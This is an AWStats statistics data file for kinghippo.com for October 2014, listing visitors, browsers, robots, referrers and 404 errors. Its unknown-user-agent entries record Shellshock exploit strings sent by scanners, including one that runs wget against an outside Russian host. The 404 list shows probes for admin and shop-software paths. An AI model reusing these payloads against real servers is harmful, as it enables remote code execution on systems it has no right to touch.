AWSTATS DATA FILE 7.0 (build 1.971)
# If you remove this file, all statistics for date 201410 will be lost/reset.
# Last config file used to build this data file was /home/kinghipp/tmp/awstats/awstats.kinghippo.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 2007                
POS_TIME 2684                
POS_VISITOR 9466                
POS_DAY 16682               
POS_DOMAIN 3415                
POS_LOGIN 4026                
POS_ROBOT 4181                
POS_WORMS 4570                
POS_EMAILSENDER 4701                
POS_EMAILRECEIVER 4844                
POS_SESSION 17424               
POS_SIDER 17594               
POS_FILETYPES 4979                
POS_DOWNLOADS 5132                
POS_OS 5203                
POS_BROWSER 5352                
POS_SCREENSIZE 6113                
POS_UNKNOWNREFERER 6187                
POS_UNKNOWNREFERERBROWSER 6798                
POS_ORIGIN 7064                
POS_SEREFERRALS 7203                
POS_PAGEREFS 7347                
POS_SEARCHWORDS 7969                
POS_KEYWORDS 8121                
POS_MISC 2348                
POS_ERRORS 8180                
POS_CLUSTER 3882                
POS_SIDER_404 8302                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20141101011014 29 4830 9381202571175
FirstTime 20141001055141
LastTime 20141031221424
LastUpdate 20141101084240 29 0 28 0 0
TotalVisits 191                 
TotalUnique 177                 
MonthHostsKnown 0                   
MonthHostsUnknown 192                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 3 3 8319 11 18 43456
1 7 7 19411 10 19 32022
2 5 15 50639 20 33 58409
3 8 19 56753 28 42 76909
4 5 18 68265 29 39 77687
5 6 27 90754 9 16 26628
6 9 29 98505 12 21 49156
7 6 23 89317 12 20 33574
8 6 7 17206 10 15 27263
9 35 35 96396 10 14 27850
10 11 37 122546 9 21 41571
11 12 21 125524 6 13 17695
12 9 30 98613 6 13 14489
13 6 16 53412 5 10 14043
14 11 26 82891 10 17 26345
15 17 17 47141 5 11 17529
16 7 22 71799 9 13 24182
17 8 18 56185 4 7 11182
18 12 48 156981 8 13 21119
19 6 11 32252 4 7 10287
20 5 20 69026 8 9 21213
21 7 19 73243 11 26 46669
22 11 19 49674 3 11 12793
23 4 9 29479 13 20 28892
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 29
us 76 125 409802
cn 37 44 105657
de 22 22 61006
ua 12 12 32617
br 12 72 253920
fi 7 9 25377
fr 6 16 50639
nl 5 10 32252
jp 4 14 47866
ru 4 9 29479
gb 3 15 101896
co 3 18 63480
pe 3 18 63480
mx 2 12 42320
ch 2 12 42320
ec 2 12 42320
it 2 7 23933
ca 2 12 42320
lt 2 2 434
tr 1 6 21160
rs 1 6 21160
es 1 6 21160
kr 1 6 21160
eu 1 1 2773
mu 1 6 21160
bo 1 6 21160
ar 1 6 21160
py 1 6 21160
ve 1 6 21160
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 7
bot[\s_+:,\.\;\/\\-] 199 366381 20141031230941 71
googlebot 79 189281 20141031045804 18
unknown 22 660 20141031070927 22
crawl 19 30743 20141031073627 8
robot 12 16818 20141027144554 6
no_user_agent 4 11092 20141028091929 0
netcraft 1 2773 20141008071928 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 5
css 58 32944 0 0
html 213 576784 0 0
js 118 1012483 0 0
cgi 3 2548 0 0
gif 104 39572 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 1
/robots.txt 125 0 3750
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS 11
linuxandroid 9
winxp 32
winlong 5
java 1
winnt 1
linux 54
winvista 1
win7 328
macosx 15
win2003 2
Unknown 48
END_OS

# Browser ID - Hits
BEGIN_BROWSER 45
msie6.0 10
chrome37.0.2062.124 6
firefox28.0 1
chrome29.0.1547.57 9
chrome38.0.2125.104 12
android 3
chrome13.0.782.220 1
chrome1.0.154.53 2
chrome38.0.2125.101 6
chrome38.0.2125.111 6
curl 2
firefox3.5.3 3
firefox31.0 11
iphone 1
msie8.0 7
chrome27.0.1453.93 1
msie7.0 2
chrome37.0.2062.120 1
firefox16.0 1
chrome10.0.648.204 5
wget 1
chrome10.0.648.11 1
msie9.0 4
Unknown 34
firefox11.0 2
netscape 6
firefox32.0 1
iceweasel 14
firefox3.5.2 9
chrome28.0.1500.71 2
firefox12.0 2
chrome32.0.1700.107 60
chrome38.0.2125.102 6
safari6.0.5 1
firefox1.0.7 1
chrome36.0.1985.143 170
firefox1.0 1
mozilla 13
chrome35.0.1916.153 32
firefox14.0.1 3
firefox22.0 25
msie10.0 1
chrome31.0.1650.16 4
firefox4.2 1
safari 12
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 10
Mozilla 20141003120445
Mozilla/5.0_(compatible;_Lipperhey_SEO_Service;_http://www.lipperhey.com/) 20141019110914
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20141013152235
Go_1.1_package_http 20141031113120
()_{_:;};_/bin/bash_-c_\ 20141021141558
nutch-1.4/Nutch-1.4 20141018120328
Mozilla/5.1_(compatible;_U5/1.0;__http://uni5download.com) 20141011112257
Ipad_Iphone_Safari 20141020045646
NerdyBot 20141031091819
()_{_:;_};_wget_http://dev.vremonte24.ru/aHR0cDovL2tpbmdoaXBwby5jb20=_>>_/dev/null 20141007023206
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 5
Apache-HttpClient/4.3.3_(java_1.5) 20141028232605
()_{_:;};_/bin/bash_-c_\ 20141021141558
nutch-1.4/Nutch-1.4 20141018120328
Go_1.1_package_http 20141031113120
NerdyBot 20141031091819
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 132 148
From1 3 3
From2 0 0
From3 70 72
From4 11 273
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 0
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 15
http://semalt.semalt.com/crawler.php 33 33
http://www.anatra.com/' 14 14
http://uni5download.com 4 4
http://www.domaintuno.com/d/kinghippo.com 4 4
http://17439117.semalt.com/crawler.php 3 3
https://www.linkedin.com 2 2
http://buttons-for-website.com 2 2
http://mawords.com/kinghippo.com 1 1
http://turtleluck.com 1 1
http://twincitiescarservice.com 1 1
http://optimist.si 1 1
http://medicovi.com 1 1
http://viandpet.com 1 1
http://privhosting.com 1 1
http://sucuri.net 1 3
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 4
403 34 63852
302 2 394
206 1 2773
404 46 76196
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 27
/404testpage4525d2fdc 1 http://sucuri.net
/cart/include/version.php 1 -
/buy/include/version.php 1 -
/register.php 2 http://kinghippo.com
/xcart/include/version.php 1 -
/admin.php 2 -
//store/password_forgotten.php 2 -
/administrator/index.php 3 -
/include/version.php 8 -
/reg.asp 1 http://kinghippo.com
/engine/engine.php 1 -
/cgi-sys/realsignup.cgi 1 -
/misc/ui/jquery.effects.blind.min.js 1 -
/404javascript.js 1 http://www.google.com/url/
/styles/actions/users/form.css 3 -
//oscommerce/password_forgotten.php 2 -
//catalog/password_forgotten.php 2 -
/store/include/version.php 1 -
/license.txt 1 -
/downloader/index.php 1 -
/index.php/admin/ 1 -
/js/mage/cookies.js 1 http://KINGHIPPO.com
/wp-login.php 4 https://www.google.com/search
/order/include/version.php 1 -
/market/include/version.php 1 -
/misc/drupal.js 1 -
/shop/include/version.php 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 192
80.82.215.165 14 14 38822 20141027153839
193.43.252.252 4 4 11092 20141011112257
192.99.40.137 4 4 0 20141028141210
62.212.77.204 3 3 8319 20141019110915
213.186.98.176 3 3 8319 20141016155112
54.86.80.215 2 2 5546 20141030221925
144.76.155.8 2 2 5546 20141031214704
202.46.63.162 2 2 5546 20141021051338
176.102.38.145 2 2 4887 20141022163346
198.252.44.4 2 2 5546 20141022192839
54.172.249.172 2 2 5546 20141030222659
77.79.40.195 2 2 434 20141021183748
175.42.85.106 2 2 5546 20141020171624
69.58.178.58 2 2 5546 20141002035219
66.104.225.66 2 12 42320 20141030103545
195.211.154.137 2 2 5546 20141014093135
60.173.10.102 2 2 5546 20141028175740
205.237.88.140 2 2 5546 20141005081940
192.81.128.31 2 4 22604 20141020045646
144.76.201.69 2 2 5546 20141028142025
202.46.62.56 2 2 5546 20141009103711
189.10.112.231 1 6 21160 20141015125249
176.15.145.26 1 1 2773 20141027184931
177.19.112.18 1 6 21160 20141004102415
197.225.62.120 1 6 21160 20141027024633
54.165.127.5 0 1 108 
54.164.148.92 0 1 16950 
5.9.188.247 1 1 2773 20141013014224
175.42.84.186 1 1 2773 20141016114312
130.211.113.170 1 1 2773 20141016090947
24.151.45.15 1 6 21160 20141024215332
192.99.149.88 1 1 2773 20141012171230
202.46.49.33 1 1 2773 20141025183449
202.46.61.55 1 1 2773 20141028214909
202.46.57.102 1 1 2773 20141005233031
146.148.74.30 1 1 2773 20141003091418
157.55.39.95 0 1 108 
68.71.44.10 1 6 21160 20141011040217
146.148.77.161 1 1 2773 20141001120558
130.211.177.50 1 1 2773 20141005091442
130.211.119.255 1 1 2773 20141006091441
201.240.146.33 1 6 21160 20141024211555
202.46.48.149 0 1 108 
146.148.54.231 1 1 2773 20141018091757
130.211.136.110 1 1 2773 20141014091433
212.253.255.139 1 6 21160 20141008123204
54.172.12.58 1 1 2773 20141002192226
119.63.193.195 1 1 2773 20141031174720
110.82.133.174 1 1 2773 20141031063541
23.23.222.104 1 1 2773 20141004070457
202.46.48.152 0 1 108 
202.46.62.57 0 1 568 
201.82.16.18 1 6 21160 20141015124040
146.148.40.50 1 1 2773 20141025091836
199.30.25.209 0 5 18387 
202.46.50.180 1 1 2773 20141024145115
157.55.39.96 0 1 108 
190.146.142.114 1 6 21160 20141009202331
81.67.211.67 1 6 21160 20141016031510
146.148.89.130 1 1 2773 20141024091816
179.181.251.90 1 6 21160 20141001201737
91.121.228.161 1 6 21160 20141011063957
54.172.31.222 1 1 2773 20141007063537
200.117.224.27 1 6 21160 20141023170359
31.164.124.24 1 6 21160 20141014071459
202.46.62.44 1 1 2773 20141017223332
202.46.50.157 1 1 2773 20141016220202
202.46.63.83 1 2 3341 20141020200709
130.211.167.148 1 1 2773 20141029091755
146.148.56.123 1 1 2773 20141005121151
202.46.49.199 1 1 2773 20141013005402
202.46.48.100 1 1 2773 20141005073749
54.172.36.97 1 1 2773 20141002192504
191.5.195.184 1 6 21160 20141011051651
130.211.121.240 1 1 2773 20141015091424
54.164.239.99 0 1 108 
107.178.218.2 1 1 2773 20141004124009
202.46.61.58 1 1 2773 20141022104012
83.100.191.56 1 6 21160 20141023074505
130.211.126.236 1 1 2773 20141001091351
207.46.13.94 0 2 33900 
62.24.181.134 1 3 59576 20141021112440
54.172.21.173 1 1 2773 20141027143005
202.46.62.186 1 1 2773 20141013203605
177.132.48.85 1 6 21160 20141031221424
5.9.104.170 1 1 2773 20141023165300
216.172.56.37 1 1 2773 20141006100819
146.148.71.139 1 1 2773 20141022091734
217.133.83.200 1 1 2773 20141010023334
107.178.210.99 1 1 2773 20141008091448
202.46.62.55 0 1 568 
202.46.52.20 1 1 2773 20141031174710
202.46.50.38 1 1 2773 20141022062142
130.211.169.143 1 1 2773 20141013091408
146.148.76.31 1 1 2773 20141030091740
85.113.58.138 1 1 2773 20141019015205
91.121.146.74 1 1 2773 20141031113120
54.165.72.62 1 1 2773 20141026103135
189.41.62.106 1 6 21160 20141014064610
162.244.33.8 1 1 2773 20141027133646
146.148.92.3 1 1 2773 20141007091445
24.44.109.237 1 6 21160 20141015025320
173.225.110.2 1 1 2773 20141031012220
96.227.124.38 1 1 2773 20141021225345
146.148.48.109 1 1 2773 20141017090705
130.211.115.99 1 1 2773 20141019091724
54.84.246.200 1 1 2773 20141018132705
130.211.134.155 1 1 2773 20141010091411
201.230.72.228 1 6 21160 20141023164403
148.251.124.42 1 1 2773 20141028142026
74.52.245.146 1 1 2773 20141011031242
201.137.238.113 1 6 21160 20141021182009
202.46.61.104 1 1 2773 20141024130952
177.148.225.210 1 6 21160 20141020054827
181.40.70.90 1 6 21160 20141029072451
78.149.95.182 1 6 21160 20141021112407
186.205.77.41 1 6 21160 20141008172643
46.229.170.197 1 1 2773 20141016034033
202.46.49.194 1 1 2773 20141013011241
202.46.48.84 1 1 2773 20141025222924
62.210.75.170 1 1 2773 20141007023206
108.59.80.35 1 1 2773 20141023091820
200.84.206.161 1 6 21160 20141012185013
165.246.71.13 1 6 21160 20141019064927
74.72.132.252 1 6 21160 20141020182509
91.121.100.66 1 1 2773 20141003233701
23.251.152.87 1 1 2773 20141002120616
54.172.35.99 1 1 2773 20141007063306
187.242.242.243 1 6 21160 20141017163351
130.211.121.161 1 1 2773 20141026091822
37.1.207.83 1 1 2773 20141021141558
190.186.160.131 1 6 21160 20141024183849
95.18.160.216 1 6 21160 20141003034442
191.254.94.169 1 6 21160 20141009164536
152.250.123.94 1 6 21160 20141005182440
54.164.132.25 1 1 2773 20141030220738
130.211.173.200 1 1 2773 20141021091905
117.78.13.29 1 1 2773 20141018120328
202.32.47.35 1 6 21160 20141016203000
54.172.212.248 1 1 2773 20141029183401
146.148.37.33 1 1 2773 20141028091821
202.46.62.70 1 1 2773 20141022014215
130.211.126.21 1 1 2773 20141012091409
178.184.29.235 1 1 2773 20141013102850
123.125.71.110 1 1 2773 20141029074312
130.211.114.218 1 1 2773 20141027091802
75.69.66.201 1 6 21160 20141016143441
185.14.192.12 1 1 2773 20141026011514
202.46.54.66 1 1 2773 20141006044729
186.66.5.253 1 6 21160 20141006102444
146.148.47.117 1 1 2773 20141003120445
38.72.114.123 1 1 2773 20141028232605
54.172.55.94 0 1 108 
202.46.62.85 1 1 2773 20141021193813
190.10.235.132 1 6 21160 20141013184547
202.46.61.59 1 1 2773 20141004140328
194.24.2.7 1 6 21160 20141023063131
2.40.108.59 1 6 21160 20141014053541
54.172.140.184 1 1 2773 20141030214819
202.46.48.78 0 1 568 
150.70.173.51 1 1 2773 20141023063307
54.88.132.248 1 1 2773 20141026103511
177.94.62.157 1 6 21160 20141011183042
87.98.161.163 1 1 0 20141015031418
148.251.69.136 1 1 2773 20141023082756
146.148.55.190 1 1 2773 20141020091818
187.21.156.228 1 6 21160 20141026104919
54.172.11.74 1 1 2773 20141015000746
123.125.71.39 1 1 2773 20141031110952
66.249.91.4 1 1 2773 20141013152235
95.180.112.253 1 6 21160 20141003105752
187.10.114.157 1 6 21160 20141015194352
146.148.63.26 1 1 2773 20141031091819
201.240.83.202 1 6 21160 20141028230655
54.160.17.7 1 1 2773 20141010152403
68.71.44.11 1 6 21160 20141011040458
54.172.158.16 0 1 568 
202.46.63.67 1 1 2773 20141029001836
175.44.56.53 1 1 2773 20141026224429
126.74.43.16 1 6 21160 20141018055525
202.46.49.38 0 1 568 
146.148.75.96 1 1 2773 20141002091332
202.46.48.45 1 1 2773 20141017022914
146.148.84.111 1 1 2773 20141004091450
130.211.144.220 1 1 2773 20141009091441
202.46.57.106 1 1 2773 20141013223210
130.211.177.114 1 1 2773 20141011091421
84.83.219.73 1 6 21160 20141008131041
187.110.172.106 1 6 21160 20141005134238
199.30.80.121 1 1 2773 20141009015738
69.30.241.18 1 1 2773 20141024161219
189.35.1.11 1 6 21160 20141012143552
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20141001 5 10 32252 5
20141002 6 6 16638 5
20141003 5 15 50639 5
20141004 5 10 32252 5
20141005 7 17 56185 7
20141006 4 9 29479 4
20141007 6 6 16638 5
20141008 6 22 69134 6
20141009 5 16 50747 5
20141010 3 4 8427 3
20141011 11 42 157775 8
20141012 6 16 52753 6
20141013 10 16 43912 10
20141014 6 21 71799 5
20141015 7 27 90186 7
20141016 9 24 80118 9
20141017 5 15 50639 5
20141018 6 11 32252 6
20141019 6 11 35025 4
20141020 7 23 107359 6
20141021 10 22 116195 9
20141022 6 6 16638 6
20141023 10 30 101278 10
20141024 7 22 74572 7
20141025 3 3 8319 3
20141026 6 12 35593 6
20141027 19 25 71642 6
20141028 8 13 37798 8
20141029 5 10 32252 5
20141030 8 15 41247 6
20141031 9 17 44588 9
END_DAY

# Session range - Number of visits
BEGIN_SESSION 3
0s-30s 188
15mn-30mn 1
30mn-1h 2
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 4
/ 213 576784 189 189
/cgi-sys/defaultwebpage.cgi 1 2114 1 1
/cgi-sys/FormMail-clone.cgi 1 416 0 1
/cgi-sys/entropysearch.cgi 1 18 1 0
END_SIDER
